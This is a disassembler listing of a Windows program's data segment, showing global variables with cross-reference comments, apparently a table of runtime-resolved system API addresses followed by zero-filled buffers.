word_4E2E7E dw 0 ; DATA XREF: sub_401C87+5C88�o
dword_4E2E80 dd 0 ; DATA XREF: sub_401C87+7E18�o
dword_4E2E84 dd 77C72C6Bh ; DATA XREF: sub_409D10+4A7�w
; sub_409D10+4EB�r ...
dword_4E2E88 dd 77EBA994h ; DATA XREF: sub_409D10+65�w
; sub_41A334+163�r
dword_4E2E8C dd 7622A3F4h ; DATA XREF: sub_409D10+80B�w
; sub_409D10+880�r ...
dword_4E2E90 dd 71C45229h ; DATA XREF: sub_409D10+9D8�w
; sub_409D10+A43�r ...
dword_4E2E94 dd 71C24870h ; DATA XREF: sub_409D10+98A�w
; sub_409D10+A13�r ...
dword_4E2E98 dd 77C71BB0h ; DATA XREF: sub_409D10+48D�w
; sub_409D10+4DB�r ...
dword_4E2E9C dd 77D4808Bh ; DATA XREF: sub_409D10+213�w
; sub_409D10+234�r ...
dword_4E2EA0 dd 71C4502Ch ; DATA XREF: sub_409D10+9CB�w
; sub_409D10+A3B�r ...
dword_4E2EA4 dd 77DE801Bh ; DATA XREF: sub_409D10+372�w
; sub_409D10+3C7�r ...
dword_4E2EA8 dd 77DDACABh ; DATA XREF: sub_409D10+40F�w
; sub_41B6C1+11E�r
dword_4E2EAC dd 77DE8075h ; DATA XREF: sub_409D10+37F�w
; sub_409D10+3CF�r ...
dword_4E2EB0 dd 77DD7496h ; DATA XREF: sub_409D10+3C0�w
; sub_41992C+AD�r
dword_4E2EB4 dd 71AB1B7Bh ; DATA XREF: sub_409D10+55A�w
; sub_40FA20+115�r ...
dword_4E2EB8 dd 77E686CCh ; DATA XREF: sub_409D10+72�w
; sub_409D10+D2�r ...
dword_4E2EBC dd 71C2498Bh ; DATA XREF: sub_409D10+97D�w
; sub_409D10+A06�r ...
dword_4E2EC0 dd 77DDAB2Fh ; DATA XREF: sub_409D10+3A6�w
; sub_409D10+3E7�r ...
dword_4E2EC4 dd 7620E8C3h ; DATA XREF: sub_409D10+859�w
; sub_409D10+8AC�r ...
dword_4E2EC8 dd 77DD23D7h ; DATA XREF: sub_409D10+2A5�w
; sub_409D10+2F0�r ...
dword_4E2ECC dd 76214750h ; DATA XREF: sub_409D10+84C�w
; sub_409D10+8A4�r ...
dword_4E2ED0 dd 77E6D75Bh ; DATA XREF: sub_409D10+B3�w
dword_4E2ED4 dd 7620BD61h ; DATA XREF: sub_409D10+866�w
; sub_409D10+8B4�r ...
dword_4E2ED8 dd 71AB60C9h ; DATA XREF: sub_409D10+54D�w
; sub_409D10+6D0�r ...
dword_4E2EDC dd 77EBA6E9h ; DATA XREF: sub_409D10+58�w
; sub_409D10+CA�r ...
dword_4E2EE0 dd 76D62A58h ; DATA XREF: sub_409D10+934�w
; sub_413B2B+11A�r
dword_4E2EE4 dd 76F36EAAh ; DATA XREF: sub_401C87:loc_40408D�r
; sub_409D10+A95�w ...
dword_4E2EE8 dd 77E802FCh ; DATA XREF: sub_409D10+A6�w
; sub_409D10+F2�r
dword_4E2EEC dd 77C75455h ; DATA XREF: sub_409D10+480�w
; sub_409D10+4D3�r ...
dword_4E2EF0 dd 71AB12A7h ; DATA XREF: sub_409D10+5F6�w
; sub_40C52D+20�r ...
dword_4E2EF4 dd 71C574FAh ; DATA XREF: sub_409D10+9BE�w
; sub_409D10+A33�r
dword_4E2EF8 dd 71AB1746h ; DATA XREF: sub_409D10+5E9�w
; sub_409D10+754�r ...
dword_4E2EFC dd 71C21CA3h ; DATA XREF: sub_409D10+A0C�w
dword_4E2F00 dd 71B28D0Dh ; DATA XREF: sub_409D10+B50�w
; sub_40B8D3+16�o ...
dword_4E2F04 dd 762211EFh ; DATA XREF: sub_409D10+7FE�w
; sub_409D10+86D�r ...
dword_4E2F08 dd 77D902E3h ; DATA XREF: sub_409D10+1B3�w
; sub_418E8C+15�r
dword_4E2F0C dd 71C2FA86h ; DATA XREF: sub_409D10+997�w
; sub_409D10+A1B�r ...
dword_4E2F10 dd 77DE1291h ; DATA XREF: sub_409D10+38C�w
; sub_409D10+3D7�r ...
dword_4E2F14 dd 77E2C1B3h ; DATA XREF: sub_409D10+399�w
; sub_409D10+3DF�r ...
dword_4E2F18 dd 73B81E3Bh ; DATA XREF: sub_409D10+C85�w
; sub_409D10+C8C�r ...
dword_4E2F1C dd 71ABF628h ; DATA XREF: sub_409D10+6AC�w
; sub_4110D4+D0�r
dword_4E2F20 dd 71AB1836h ; DATA XREF: sub_401300+1D�r
; sub_401300+23�r ...
dword_4E2F24 dd 77C72889h ; DATA XREF: sub_409D10+4B4�w
; sub_415D1B+207�r
dword_4E2F28 dd 71C453F8h ; DATA XREF: sub_409D10+9E5�w
; sub_409D10+A4B�r ...
dword_4E2F2C dd 77DD5C55h ; DATA XREF: sub_401000+55�r
; sub_409D10+2B2�w ...
dword_4E2F30 dd 77E96645h ; DATA XREF: sub_409D10+7F�w
; sub_409D10+DA�r ...
dword_4E2F34 dd 77428B97h ; DATA XREF: sub_401C87+59CB�r
; sub_401C87+7A73�r ...
dword_4E2F38 dd 71AB41DAh ; DATA XREF: sub_401404+8C�r
; sub_401C87+519D�r ...
dword_4E2F3C dd 762059A3h ; DATA XREF: sub_409D10+825�w
; sub_409D10+890�r ...
dword_4E2F40 dd 71C4A1B4h ; DATA XREF: sub_409D10+9A4�w
; sub_409D10+A23�r
dword_4E2F44 dd 1F7CD214h ; DATA XREF: sub_409D10+C0E�w
; sub_409D10+C3F�r
dword_4E2F48 dd 77E09134h ; DATA XREF: sub_409D10+2CC�w
; sub_419036+47�r
dword_4E2F4C dd 77D4456Bh ; DATA XREF: sub_409D10+22D�w
; sub_4125C5+40�r ...
dword_4E2F50 dd 76D629BBh ; DATA XREF: sub_409D10+91A�w
; sub_409D10+92E�r ...
dword_4E2F54 dd 1F7B9D96h ; DATA XREF: sub_409D10+C28�w
dword_4E2F58 dd 77E09070h ; DATA XREF: sub_409D10+2D9�w
; sub_419036+4F�r
dword_4E2F5C dd 71AB1740h ; DATA XREF: sub_409D10+574�w
; sub_409D10+6E8�r ...
dword_4E2F60 dd 7620AFB6h ; DATA XREF: sub_409D10+83F�w
; sub_409D10+873�r
dword_4E2F64 dd 77D5C13Ah ; DATA XREF: sub_409D10+220�w
; sub_409D10+23C�r ...
dword_4E2F68 dd 77D45B19h ; DATA XREF: sub_409D10+172�w
; sub_409D10+1C2�r ...
dword_4E2F6C dd 71AB157Eh ; DATA XREF: sub_401C87+1DDD�r
; sub_401C87+5B85�r ...
dword_4E2F70 dd 71AB3E5Dh ; DATA XREF: sub_4019A5+C4�r
; sub_401C87+5227�r ...
dword_4E2F74 dd 71AB14DCh ; DATA XREF: sub_409D10+567�w
; sub_409D10+6DC�r ...
dword_4E2F78 dd 0CC0004h ; DATA XREF: sub_409D10+8DB�w
; sub_409D10:loc_40A609�w ...
dword_4E2F7C dd 77DD590Bh ; DATA XREF: sub_401000+2A�r
; sub_409D10+28B�w ...
dword_4E2F80 dd 71ABD755h ; DATA XREF: sub_401C87+79EF�r
; sub_409D10+69F�w ...
dword_4E2F84 dd 77DF7311h ; DATA XREF: sub_409D10+32D�w
; sub_409D10+341�r ...
dword_4E2F88 dd 77DDA2AFh ; DATA XREF: sub_409D10+3B3�w
; sub_409D10+3EF�r ...
dword_4E2F8C dd 1F7CD927h ; DATA XREF: sub_409D10+C01�w
; sub_409D10+C37�r
dword_4E2F90 dd 76206853h ; DATA XREF: sub_409D10+818�w
; sub_409D10+888�r ...
dword_4E2F94 dd 77D4932Ch ; DATA XREF: sub_409D10+206�w
; sub_409D10+227�r ...
dword_4E2F98 dd 77D5E310h ; DATA XREF: sub_409D10+18C�w
; sub_409D10+1D2�r ...
dword_4E2F9C dd 76206B7Fh ; DATA XREF: sub_409D10+832�w
; sub_409D10+898�r ...
dword_4E2FA0 dd 71AB1444h ; DATA XREF: sub_409D10+624�w
; sub_409D10+774�r ...
dword_4E2FA4 dd 77DD189Ah ; DATA XREF: sub_401000+5E�r
; sub_409D10+2BF�w ...
dword_4E2FA8 dd 71AB3F8Dh ; DATA XREF: sub_409D10+66B�w
; sub_409D10+79C�r ...
dword_4E2FAC dd 77DD5D20h ; DATA XREF: sub_409D10+320�w
; sub_409D10+334�r ...
dword_4E2FB0 dd 71AB1890h ; DATA XREF: sub_409D10+644�w
; sub_409D10+784�r ...
dword_4E2FB4 dd 77C76B34h ; DATA XREF: sub_409D10+44C�w
; sub_409D10+4AE�r ...
dword_4E2FB8 dd 77D5E38Ch ; DATA XREF: sub_409D10+199�w
; sub_409D10+1DA�r ...
dword_4E2FBC dd 77DDA20Bh ; DATA XREF: sub_409D10+365�w
; sub_409D10+3BA�r ...
dword_4E2FC0 dd 76F36EEBh ; DATA XREF: sub_409D10+AA2�w
dword_4E2FC4 dd 71AB12A7h ; DATA XREF: sub_409D10+5DC�w
; sub_409D10+748�r ...
dword_4E2FC8 dd 71AB1746h ; DATA XREF: sub_4019A5+3E�r
; sub_401C87+51D9�r ...
dword_4E2FCC dd 77EBA595h ; DATA XREF: sub_409D10+4B�w
; sub_409D10+C2�r ...
dword_4E2FD0 dd 77C7531Dh ; DATA XREF: sub_409D10+473�w
; sub_409D10+4CB�r ...
dword_4E2FD4 dd 77D4BDCAh ; DATA XREF: sub_409D10+165�w
; sub_409D10+1BA�r ...
dword_4E2FD8 dd 71C3516Ah ; DATA XREF: sub_409D10+9FF�w
; sub_409D10+A5B�r ...
dword_4E2FDC dd 71AB32CAh ; DATA XREF: sub_409D10+685�w
; sub_409D10+7AC�r ...
dword_4E2FE0 dd 71AB5690h ; DATA XREF: sub_401B0B+D1�r
; sub_401C87+523C�r ...
dword_4E2FE4 dd 1F7CB8F8h ; DATA XREF: sub_409D10+C1B�w
; sub_409D10+C47�r
dword_4E2FE8 dd 77EBB1E7h ; DATA XREF: sub_409D10+3E�w
; sub_409D10+BA�r ...
dword_4E2FEC dd 77DD59F0h ; DATA XREF: sub_401000+49�r
; sub_409D10+298�w ...
dword_4E2FF0 dd 71AB5DE2h ; DATA XREF: sub_409D10+651�w
; sub_409D10+78C�r ...
dword_4E2FF4 dd 71AB3ECEh ; DATA XREF: sub_409D10+637�w
; sub_409D10+77C�r ...
dword_4E2FF8 dd 73B81B0Fh ; DATA XREF: sub_401C87+7411�r
; sub_409D10+C92�w
dword_4E2FFC dd 76204E4Dh ; DATA XREF: sub_409D10+879�w
; sub_416D68+4C9�r ...
dword_4E3000 dd 0 ; DATA XREF: sub_409D10+112�w
dword_4E3004 dd 1F7D886Ah ; DATA XREF: sub_409D10+BE7�w
; sub_409D10+C22�r
dword_4E3008 dd 71AB12F8h ; DATA XREF: sub_401C87+2FE8�r
; sub_401C87+604E�r ...
dword_4E300C dd 77C76551h ; DATA XREF: sub_409D10+459�w
; sub_409D10+4BB�r ...
dword_4E3010 dd 77C729E2h ; DATA XREF: sub_409D10+49A�w
; sub_409D10+4E3�r ...
dword_4E3014 dd 77C7212Fh ; DATA XREF: sub_409D10+466�w
; sub_409D10+4C3�r ...
dword_4E3018 dd 71AB1AF4h ; DATA XREF: sub_401B0B+89�r
; sub_401C87+5259�r ...
dword_4E301C dd 77D5E303h ; DATA XREF: sub_409D10+1A6�w
; sub_409D10+1E2�r ...
dword_4E3020 dd 71C4576Ch ; DATA XREF: sub_409D10+9F2�w
; sub_409D10+A53�r ...
dword_4E3024 dd 77D4702Fh ; DATA XREF: sub_409D10+158�w
; sub_409D10+1AD�r ...
dword_4E3028 dd 77E6C0E3h ; DATA XREF: sub_409D10+8C�w
; sub_409D10+E2�r ...
dword_4E302C dd 71AB1ED3h ; DATA XREF: sub_409D10+610�w
; sub_409D10+764�r ...
dword_4E3030 dd 71B2A381h ; DATA XREF: sub_409D10+B43�w
; sub_409D10+B5F�r
dword_4E3034 dd 77DDA595h ; DATA XREF: sub_409D10+33A�w
; sub_41A2C9+55�r
dword_4E3038 dd 77DD22EAh ; DATA XREF: sub_409D10+27E�w
; sub_409D10+2D3�r ...
dword_4E303C dd 773F97B0h ; DATA XREF: sub_409D10+BAA�w
dword_4E3040 dd 76D67A29h ; DATA XREF: sub_409D10+AEC�w
; sub_40ADC9+D4�r
dword_4E3044 dd 76D674FAh ; DATA XREF: sub_409D10+ADF�w
; sub_409D10+AE6�r ...
dword_4E3048 dd 71AB3C22h ; DATA XREF: sub_4019A5+A6�r
; sub_401C87+51B8�r ...
dword_4E304C dd 71AB2BBFh ; DATA XREF: sub_401C87+51AA�r
; sub_401C87+7A13�r ...
dword_4E3050 dd 1F7BA3A9h ; DATA XREF: sub_409D10+BF4�w
; sub_409D10+C2F�r
dword_4E3054 dd 71AB401Ch ; DATA XREF: sub_401C87+1E03�r
; sub_401C87+5BAB�r ...
dword_4E3058 dd 71C214BAh ; DATA XREF: sub_409D10+9B1�w
; sub_409D10+A2B�r ...
dword_4E305C dd 71AB868Dh ; DATA XREF: sub_409D10+65E�w
; sub_409D10+794�r ...
dword_4E3060 dd 71AB1A6Dh ; DATA XREF: sub_401300+12�r
; sub_4019A5+D0�r ...
dword_4E3064 dd 71AB155Ah ; DATA XREF: sub_409D10+59B�w
; sub_409D10+70C�r ...
dword_4E3068 dd 71B22C25h ; DATA XREF: sub_409D10+B36�w
; sub_409D10+B57�r
dword_4E306C dd 71AB5A01h ; DATA XREF: sub_409D10+540�w
; sub_409D10+6C4�r ...
dword_4E3070 dd 71B2ACCBh ; DATA XREF: sub_409D10+B29�w
; sub_409D10+B4A�r
dword_4E3074 dd 77E78C17h ; DATA XREF: sub_401404+52�r
; sub_409D10+31�w ...
dword_4E3078 dd 77D49A11h ; DATA XREF: sub_409D10+17F�w
; sub_409D10+1CA�r ...
dword_4E307C dd 76D62A37h ; DATA XREF: sub_409D10+927�w
; sub_409D10+93B�r ...
off_4E3080 dd offset sub_50A1C7 ; DATA XREF: sub_409D10+99�w
; sub_409D10+EA�r ...
dword_4E3084 dd 0 ; DATA XREF: sub_409D10:loc_409E0E�w
; sub_409D10+12B�w ...
dword_4E3088 dd 0 ; DATA XREF: sub_409D10+126�w
; sub_40A9CC+1C�r
dword_4E308C dd 0 ; DATA XREF: sub_409D10:loc_409EFE�w
; sub_409D10:loc_409F65�w ...
dword_4E3090 dd 0 ; DATA XREF: sub_409D10+250�w
; sub_40A9CC+50�r
dword_4E3094 dd 0 ; DATA XREF: sub_401404+337�r
; sub_401C87+4547�r ...
dword_4E3098 dd 0 ; DATA XREF: sub_409D10+41E�w
; sub_40A9CC+84�r
dword_4E309C dd 0 ; DATA XREF: sub_409D10:loc_40A214�w
; sub_40A9CC:loc_40AA7C�r
dword_4E30A0 dd 0 ; DATA XREF: sub_409D10+4FF�w
; sub_40A9CC+B8�r
dword_4E30A4 dd 0 ; DATA XREF: sub_409D10:loc_40A4E5�w
; sub_40A9CC:loc_40AAB0�r
dword_4E30A8 dd 0 ; DATA XREF: sub_409D10+7D0�w
; sub_40A9CC+EC�r
dword_4E30AC dd 0 ; DATA XREF: sub_409D10:loc_40A5D0�w
; sub_409D10+8EF�w ...
dword_4E30B0 dd 0 ; DATA XREF: sub_409D10+8EA�w
; sub_40A9CC+120�r
dword_4E30B4 dd 0 ; DATA XREF: sub_401C87:loc_407172�r
; sub_409D10:loc_40A664�w ...
dword_4E30B8 dd 0 ; DATA XREF: sub_409D10+94F�w
; sub_40A9CC+154�r
dword_4E30BC dd 0 ; DATA XREF: sub_401C87+454F�r
; sub_409D10:loc_40A780�w ...
dword_4E30C0 dd 0 ; DATA XREF: sub_409D10+A6B�w
; sub_40A9CC+188�r
dword_4E30C4 dd 0 ; DATA XREF: sub_409D10:loc_40A7CA�w
; sub_40A9CC:loc_40AB80�r
dword_4E30C8 dd 0 ; DATA XREF: sub_409D10+AB5�w
; sub_40A9CC+1BC�r
dword_4E30CC dd 0 ; DATA XREF: sub_409D10:loc_40A814�w
; sub_40A9CC:loc_40ABB4�r
dword_4E30D0 dd 0 ; DATA XREF: sub_409D10+AFF�w
; sub_40A9CC+1F0�r
dword_4E30D4 dd 0 ; DATA XREF: sub_409D10:loc_40A888�w
; sub_40A9CC:loc_40ABE8�r
dword_4E30D8 dd 0 ; DATA XREF: sub_409D10+B73�w
; sub_40A9CC+224�r
dword_4E30DC dd 0 ; DATA XREF: sub_409D10:loc_40A8D2�w
; sub_40A9CC:loc_40AC1C�r
dword_4E30E0 dd 0 ; DATA XREF: sub_409D10+BBD�w
; sub_40A9CC+258�r
dword_4E30E4 dd 0 ; DATA XREF: sub_409D10:loc_40A970�w
; sub_40A9CC:loc_40AC50�r
dword_4E30E8 dd 0 ; DATA XREF: sub_409D10+C5B�w
; sub_40A9CC+28C�r
dword_4E30EC dd 0 ; DATA XREF: sub_409D10:loc_40A9BA�w
; sub_40A9CC:loc_40AC84�r
dword_4E30F0 dd 0 ; DATA XREF: sub_409D10+CA5�w
; sub_40A9CC+2C0�r
dword_4E30F4 dd 4 dup(0) ; DATA XREF: sub_40AEAD+32�o
dword_4E3104 dd 0 ; DATA XREF: _0:0040AD08�o
byte_4E3108 db 0 ; DATA XREF: _0:0040B1EF�o
byte_4E3109 db 0 ; DATA XREF: sub_40B2E7+33�o
word_4E310A dw 0 ; DATA XREF: sub_40B2E7+63�o
byte_4E310C db 0 ; DATA XREF: sub_40B590+64�r
; sub_40B590+92�w
align 10h
dword_4E3110 dd 0 ; DATA XREF: sub_40BFD2+18�r
; sub_40C575+92�w ...
dword_4E3114 dd 0 ; DATA XREF: sub_40C87D+1F7�r
; sub_40CA91+D9�w ...
dd 40Ah dup(0)
db 3 dup(0)
byte_4E4143 db 0 ; DATA XREF: _2:004547AC�o
dd 2 dup(0)
dword_4E414C dd 0 ; DATA XREF: _2:off_4516BC�o
dword_4E4150 dd 1FDh dup(0) ; DATA XREF: _2:00454888�o
db 2 dup(0)
word_4E4946 dw 0 ; DATA XREF: _2:004545EC�o _2:004545F4�o
dd 1F2h dup(0)
dword_4E5110 dd 6 dup(0) ; DATA XREF: sub_40C87D+C0�o
; sub_40C87D+129�o ...
dword_4E5128 dd 0 ; DATA XREF: sub_40C049+2B7�w
; sub_40C049+34D�o
dword_4E512C dd 0 ; DATA XREF: sub_40C049+343�w
; sub_40C049+35F�r
dword_4E5130 dd 0 ; DATA XREF: sub_40C049+2C2�w
dword_4E5134 dd 0 ; DATA XREF: sub_40C049+2AC�w
; sub_40C049+320�r
dword_4E5138 dd 20h dup(0) ; DATA XREF: sub_40C049+2D5�o
; sub_40C049+307�o
dword_4E51B8 dd 0 ; DATA XREF: sub_40C049+2C8�w
dword_4E51BC dd 0 ; DATA XREF: sub_40C049+2DF�w
; sub_40C049+311�w
dword_4E51C0 dd 0 ; DATA XREF: sub_40C049:loc_40C4E2�r
align 8
dword_4E51C8 dd 0 ; DATA XREF: sub_40C049+82�w
; sub_40C049+FE�o
dword_4E51CC dd 41h dup(0) ; DATA XREF: sub_40C049+41�o
dword_4E52D0 dd 1Dh dup(0) ; DATA XREF: sub_40C049+69�o
db 0
byte_4E5345 db 3 dup(0) ; DATA XREF: _2:00454778�o
dd 23h dup(0)
dword_4E53D4 dd 0 ; DATA XREF: sub_40C049+F4�w
; sub_40C049+110�r
dword_4E53D8 dd 0 ; DATA XREF: sub_40C049+52�w
dword_4E53DC dd 0 ; DATA XREF: sub_40C049+4D�w
; sub_40C049+D1�r
dword_4E53E0 dd 20h dup(0) ; DATA XREF: sub_40C049+9A�o
; sub_40C049+B7�o
dword_4E5460 dd 0 ; DATA XREF: sub_40C049+8F�w
dword_4E5464 dd 0 ; DATA XREF: sub_40C049+A4�w
; sub_40C049+C1�w
dword_4E5468 dd 0 ; DATA XREF: sub_40C049:loc_40C214�r
align 10h
dword_4E5470 dd 0 ; DATA XREF: sub_40C049+194�w
; sub_40C049+226�o
dword_4E5474 dd 41h dup(0) ; DATA XREF: sub_40C049+156�o
dword_4E5578 dd 41h dup(0) ; DATA XREF: sub_40C049+17B�o
dword_4E567C dd 0 ; DATA XREF: sub_40C049+21C�w
; sub_40C049+238�r
dword_4E5680 dd 0 ; DATA XREF: sub_40C049+169�w
dword_4E5684 dd 0 ; DATA XREF: sub_40C049+164�w
; sub_40C049+1F9�r
dword_4E5688 dd 20h dup(0) ; DATA XREF: sub_40C049+1AD�o
; sub_40C049+1DF�o
dword_4E5708 dd 0 ; DATA XREF: sub_40C049+1A0�w
dword_4E570C dd 0 ; DATA XREF: sub_40C049+1B7�w
; sub_40C049+1E9�w
dword_4E5710 dd 0 ; DATA XREF: sub_40C049:loc_40C33C�r
align 8
dword_4E5718 dd 0 ; DATA XREF: sub_40C049+40E�w
; sub_40C049+467�o
dword_4E571C dd 0A2h dup(0) ; DATA XREF: sub_40C049+3FC�o
dword_4E59A4 dd 41h dup(0) ; DATA XREF: sub_40C049+3C6�o
dword_4E5AA8 dd 0 ; DATA XREF: sub_40C049+3F3�w
; sub_40C049+41A�r
align 10h
dword_4E5AB0 dd 0 ; DATA XREF: sub_40C049+45D�w
; sub_40C049+479�r
dword_4E5AB4 dd 0 ; DATA XREF: sub_40C049+420�w
dword_4E5AB8 dd 0 ; DATA XREF: sub_40C049+42D�w
dword_4E5ABC dd 0 ; DATA XREF: sub_40C049+3ED�w
dd 0
dword_4E5AC4 dd 0 ; DATA XREF: sub_40C049:loc_40C4F7�r
dword_4E5AC8 dd 0 ; DATA XREF: sub_40BC9B+E�r
; sub_40BC9B+31�r ...
dword_4E5ACC dd 0 ; DATA XREF: sub_40BC9B+9�r
; sub_40BC9B+25�r ...
dword_4E5AD0 dd 80h dup(0) ; DATA XREF: sub_40CCE8+8D�o
dword_4E5CD0 dd 2 dup(0) ; DATA XREF: sub_40D667+68�o
byte_4E5CD8 db 2 dup(0) ; DATA XREF: sub_40D117+13�o
word_4E5CDA dw 0 ; DATA XREF: sub_40D95B+10�o
dword_4E5CDC dd 2080Ah ; DATA XREF: sub_40E19F+8�w
; sub_40E29B+2CC�o
byte_4E5CE0 db 0 ; DATA XREF: sub_40E29B+64�o
byte_4E5CE1 db 3 dup(0) ; DATA XREF: sub_40E29B+69�o
dword_4E5CE4 dd 2 dup(0) ; DATA XREF: sub_40E29B+1FB�o
dword_4E5CEC dd 0 ; DATA XREF: _0:0040EC69�o
dword_4E5CF0 dd 0 ; DATA XREF: sub_40EE18+1F�r
; sub_40EE63+BC�o ...
dword_4E5CF4 dd 0 ; DATA XREF: sub_40EE63+B7�o
; sub_40EE63+DA�r ...
dword_4E5CF8 dd 0 ; DATA XREF: sub_40EE63+9A�o
; sub_40EE63+CF�r ...
dword_4E5CFC dd 0 ; DATA XREF: sub_40EDD5+35�r
; sub_40EE63+95�o ...
dword_4E5D00 dd 0 ; DATA XREF: sub_40EDD5+17�r
; sub_40EE18+3D�r ...
dword_4E5D04 dd 0D220h ; DATA XREF: sub_40C049+2A1�r
; sub_40F038+10�w ...
dword_4E5D08 dd 0 ; DATA XREF: sub_40BD06+1B�r
; sub_40F04F+27C�w
dword_4E5D0C dd 0 ; DATA XREF: sub_40F909+2A�w
; sub_40F909+51�r ...
dword_4E5D10 dd 2 dup(0) ; DATA XREF: sub_4109F3+74�o
dword_4E5D18 dd 0 ; DATA XREF: sub_4110D4+146�r
align 10h
dword_4E5D20 dd 0 ; DATA XREF: sub_4110D4+139�o
byte_4E5D24 db 0 ; DATA XREF: sub_41206F+1EF�r
align 4
dword_4E5D28 dd 0 ; DATA XREF: sub_412C10+4�w
; sub_412C10+9�o
align 10h
byte_4E5D30 db 0 ; DATA XREF: sub_413740+1C1�w
; sub_413740+2C0�o
align 2
word_4E5D32 dw 0 ; DATA XREF: sub_413740+1D1�w
word_4E5D34 dw 0 ; DATA XREF: sub_413740+1D7�w
word_4E5D36 dw 0 ; DATA XREF: sub_413740+1DE�w
byte_4E5D38 db 0 ; DATA XREF: sub_413740+1E5�w
byte_4E5D39 db 0 ; DATA XREF: sub_413740+1EC�w
word_4E5D3A dw 0 ; DATA XREF: sub_413740+1F2�w
dword_4E5D3C dd 0 ; DATA XREF: sub_413740+220�w
; sub_413740+23E�w
dword_4E5D40 dd 0 ; DATA XREF: sub_413740+246�w
byte_4E5D44 db 0 ; DATA XREF: sub_413740+258�w
byte_4E5D45 db 0 ; DATA XREF: sub_413740+26B�w
word_4E5D46 dw 0 ; DATA XREF: sub_413740+283�w
word_4E5D48 dw 0 ; DATA XREF: sub_413740+292�w
word_4E5D4A dw 0 ; DATA XREF: sub_413740+28A�w
dword_4E5D4C dd 101h dup(0) ; DATA XREF: sub_413740+2A7�o
dword_4E6150 dd 80h dup(0) ; DATA XREF: sub_401C87+2F5E�o
; sub_401C87:loc_404C94�o ...
byte_4E6350 db 0 ; DATA XREF: sub_414FC9+19F�w
; sub_414FC9+278�o
align 2
word_4E6352 dw 0 ; DATA XREF: sub_414FC9+1AC�w
word_4E6354 dw 0 ; DATA XREF: sub_414FC9+1B6�w
word_4E6356 dw 0 ; DATA XREF: sub_414FC9+1BF�w
byte_4E6358 db 0 ; DATA XREF: sub_414FC9+1C6�w
byte_4E6359 db 0 ; DATA XREF: sub_414FC9+1CD�w
word_4E635A dw 0 ; DATA XREF: sub_414FC9+1D4�w
dword_4E635C dd 0 ; DATA XREF: sub_414FC9+1E1�w
dword_4E6360 dd 0 ; DATA XREF: sub_414FC9+1E9�w
word_4E6364 dw 0 ; DATA XREF: sub_414FC9+242�w
word_4E6366 dw 0 ; DATA XREF: sub_414FC9+22A�w
word_4E6368 dw 0 ; DATA XREF: sub_414FC9+254�w
word_4E636A dw 0 ; DATA XREF: sub_414FC9+1F5�w
dword_4E636C dd 100h dup(0) ; DATA XREF: sub_414FC9+263�o
dword_4E676C dd 0 ; DATA XREF: sub_401C87+19D4�w
; sub_401C87+2F56�r ...
dd 0
byte_4E6774 db 0 ; DATA XREF: sub_4154BB+237�o
; sub_4154BB+246�w ...
byte_4E6775 db 0 ; DATA XREF: sub_4154BB+25A�w
word_4E6776 dw 0 ; DATA XREF: sub_4154BB+28B�w
word_4E6778 dw 0 ; DATA XREF: sub_4154BB+272�w
; sub_4154BB:loc_415872�w
word_4E677A dw 0 ; DATA XREF: sub_4154BB+291�w
byte_4E677C db 0 ; DATA XREF: sub_4154BB+27E�w
byte_4E677D db 0 ; DATA XREF: sub_4154BB+253�w
word_4E677E dw 0 ; DATA XREF: sub_4154BB+3D7�w
; sub_4154BB+401�w
dword_4E6780 dd 0 ; DATA XREF: sub_4154BB:loc_41576B�w
; sub_4154BB+381�r
dword_4E6784 dd 0 ; DATA XREF: sub_4154BB+2BD�w
word_4E6788 dw 0 ; DATA XREF: sub_4154BB+37B�w
; sub_4154BB+3CD�o
word_4E678A dw 0 ; DATA XREF: sub_4154BB+31C�w
; sub_4154BB+341�r ...
dword_4E678C dd 0 ; DATA XREF: sub_4154BB+2F3�w
; sub_4154BB+3BE�w
dword_4E6790 dd 0 ; DATA XREF: sub_4154BB+30F�w
; sub_4154BB+392�w ...
byte_4E6794 db 0 ; DATA XREF: sub_4154BB+2F8�r
; sub_4154BB+306�w
byte_4E6795 db 0 ; DATA XREF: sub_4154BB+2C2�w
; sub_4154BB+38B�w ...
word_4E6796 dw 0 ; DATA XREF: sub_4154BB+2D0�w
word_4E6798 dw 0 ; DATA XREF: sub_4154BB+3DE�w
; sub_4154BB+40F�w
word_4E679A dw 0 ; DATA XREF: sub_4154BB+315�w
word_4E679C dw 0 ; DATA XREF: sub_4154BB+347�w
; sub_4154BB+417�o
word_4E679E dw 0 ; DATA XREF: sub_4154BB+356�w
; sub_4154BB+3EE�w
dword_4E67A0 dd 0 ; DATA XREF: sub_4154BB+350�w
dd 2 dup(0)
dword_4E67AC dd 0 ; DATA XREF: sub_4154BB+386�w
; sub_4154BB+3FC�o
dword_4E67B0 dd 0 ; DATA XREF: sub_4154BB+322�w
byte_4E67B4 db 0 ; DATA XREF: sub_4154BB+328�w
byte_4E67B5 db 0 ; DATA XREF: sub_4154BB+32E�w
word_4E67B6 dw 0 ; DATA XREF: sub_4154BB+33B�w
dword_4E67B8 dd 6 dup(0) ; DATA XREF: sub_4154BB+3D2�o
dword_4E67D0 dd 0 ; DATA XREF: sub_4154BB+30�w
; sub_4154BB+420�r
align 8
dword_4E67D8 dd 100h dup(0) ; DATA XREF: sub_4154BB+1BB�o
; sub_4154BB+463�o
dword_4E6BD8 dd 1000h dup(0) ; DATA XREF: sub_415A3C+1D�o
; _0:00415B26�o ...
dword_4EABD8 dd 0 ; DATA XREF: sub_415A3C+13�o
; _0:00415B6D�o ...
dd 6 dup(0)
dword_4EABF4 dd 0 ; DATA XREF: sub_4165C7:loc_41665A�o
dword_4EABF8 dd 0 ; DATA XREF: sub_416D68+438�o
dword_4EABFC dd 0Dh dup(0) ; DATA XREF: sub_41727E+F�o
dword_4EAC30 dd 80h dup(0) ; DATA XREF: sub_417F2F+41�o
dword_4EAE30 dd 200h dup(0) ; DATA XREF: sub_41786C+C7�o
; sub_417BC7+DD�o ...
dword_4EB630 dd 200h dup(0) ; DATA XREF: sub_41786C+D6�o
; sub_417BC7+F4�o ...
dword_4EBE30 dd 0 ; DATA XREF: sub_41786C+86�w
; sub_417A3E+94�r
dword_4EBE34 dd 0 ; DATA XREF: sub_41786C+A7�w
; sub_417E98+55�r ...
dword_4EBE38 dd 0 ; DATA XREF: sub_41786C+A0�w
; sub_417A3E+D6�r ...
dword_4EBE3C dd 0 ; DATA XREF: sub_41786C+79�w
; sub_417A3E+35�r ...
dword_4EBE40 dd 80h dup(0) ; DATA XREF: sub_417E98+5E�o
dword_4EC040 dd 0 ; DATA XREF: sub_41786C+93�w
; sub_417A3E+A2�r
dword_4EC044 dd 0 ; DATA XREF: sub_41786C+E7�o
; sub_41786C+103�r ...
dword_4EC048 dd 0 ; DATA XREF: sub_417BC7+178�w
; sub_417D6B+107�w
